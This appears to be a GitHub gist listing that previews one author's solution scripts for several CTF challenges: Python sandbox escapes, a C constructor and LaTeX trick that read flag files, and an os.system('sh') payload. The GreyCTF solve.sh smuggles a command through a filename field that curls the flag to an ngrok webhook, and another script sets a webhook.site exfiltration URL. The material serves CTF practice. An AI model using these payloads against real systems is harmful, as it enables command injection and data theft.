Skip to content

Instantly share code, notes, and snippets.

@lebr0nli
lebr0nli / solve.py
Last active November 29, 2022 01:55
Solution for HITCON CTF 2022 - V O I D (Misc)
from pwn import *
import dis
def gen_varname() -> str:
d = {}
class Checker:
def __getattribute__(self, __name: str) -> bool:
if d.get(__name, False):
@lebr0nli
lebr0nli / pwn.c
Last active December 13, 2022 15:41
ROIS CTF 2022 - filechecker_pro_max solution
#include <stdio.h>
#include <fcntl.h>
#include <unistd.h>
__attribute__((constructor)) void pwn() {
// open /flag and printf it
int fd = open("/flag", O_RDONLY);
char buf[0x100];
read(fd, buf, 0x100);
printf("%s", buf);
@lebr0nli
lebr0nli / solve.py
Last active January 15, 2023 22:07
solution for idek CTF 2023 - pyjail revenge (Misc)
from pwn import *
def main() -> None:
io = remote("pyjail-revenge.chal.idek.team", 1337)
# __import__('__main__').any = all
# sys.modules = {'idlelib.pyshell': __import__('__main__')}
# import idlelib.idle
# https://github.com/python/cpython/blob/206f05a46b426eb374f724f8e7cd42f2f9643bb8/Lib/idlelib/idle.py#L13-L14
@lebr0nli
lebr0nli / solve.py
Created February 11, 2023 09:23
Solution for LACTF - pycjail (Misc)
from opcode import opmap
import dis
code = b""
code += bytes([opmap["LOAD_CONST"], 0])
code += bytes([opmap["GET_LEN"], 0])
code += bytes([opmap["IMPORT_FROM"], 0])
code += bytes([opmap["ROT_TWO"], 0])
code += bytes([opmap["CALL_FUNCTION"], 1])
@lebr0nli
lebr0nli / pwn.tex
Last active May 1, 2023 01:57
UMDCTF 2023 - Homework Render (Web) solution
\RequirePackage{etoolbox}
\documentclass{article}
\providecommand{\x}{pdff}
\begin{document}
\csuse{\x iledump} offset 0 length 99 {/app/flag}
\end{document}
@lebr0nli
lebr0nli / solve.sh
Last active May 21, 2023 14:12
Solution for GreyCTF'23 - Sort It Out (Web)
#!/bin/bash
WEBHOOK="0.tcp.jp.ngrok.io:11048"
curl -i -s -k -X $'POST' \
-H $'Host: 34.124.157.94:10556' -H $'Content-Type: application/x-www-form-urlencoded' \
--data-binary $'filename=--compress-program=sh -z /proc/self/cmdline -o /tmp/lebr0nli`curl${IFS}-d${IFS}$($(echo${IFS}L3JlYWRmbGFnCg==|base64${IFS}-d))${IFS}'"$WEBHOOK"'`' \
$'http://34.124.157.94:10556/index.php' -o /dev/null
@lebr0nli
lebr0nli / solve1.py
Last active June 4, 2023 22:57
justCTF 2023 - PyPlugins (misc + pwn)
# encoding: utf-7
# a+AAo-import os;os.system('sh')
# upload this file as index.html to your github pages
@lebr0nli
lebr0nli / fuzz.py
Created June 10, 2023 07:15
SEETF 2023 - 🤪 Another PyJail (Misc)
def gen_payload(name_idx: int) -> str:
payload = '(0 if 1 else f"'
for i in range(name_idx):
payload += "{a_%s}" % i
payload += '")'
payload = "(0 if %s else %s)" % (payload, f"a_{name_idx}")
return payload
payload = f"""
lambda getattr: [getattr(getattr, f"{{x}}") for x in {gen_payload(int(input()))}]
@lebr0nli
lebr0nli / solve.py
Last active June 12, 2023 02:15
SEETF 2023 - 🎓🌎 PlantUML (Web)
from pwn import *
WEBHOOK_URL = "https://webhook.site/64021412-a0e0-4f76-bde4-3bb705c13da4/"
def conn() -> tube:
if args.LOCAL:
return remote("localhost", 1337)
return remote("win.the.seetf.sg", 5000)
@lebr0nli
lebr0nli / solve.py
Last active August 12, 2024 16:20
UIUCTF 2023 - Rattler Read
from pwn import *
with remote("rattler-read.chal.uiuc.tf", 1337) as io:
payload = (
"""
g=(print(g.gi_frame.f_back.f_back.f_builtins['open']('/flag.txt').read())for x in(0,))
for x in g:0
""".strip()
.replace("\n", "\r")
.encode()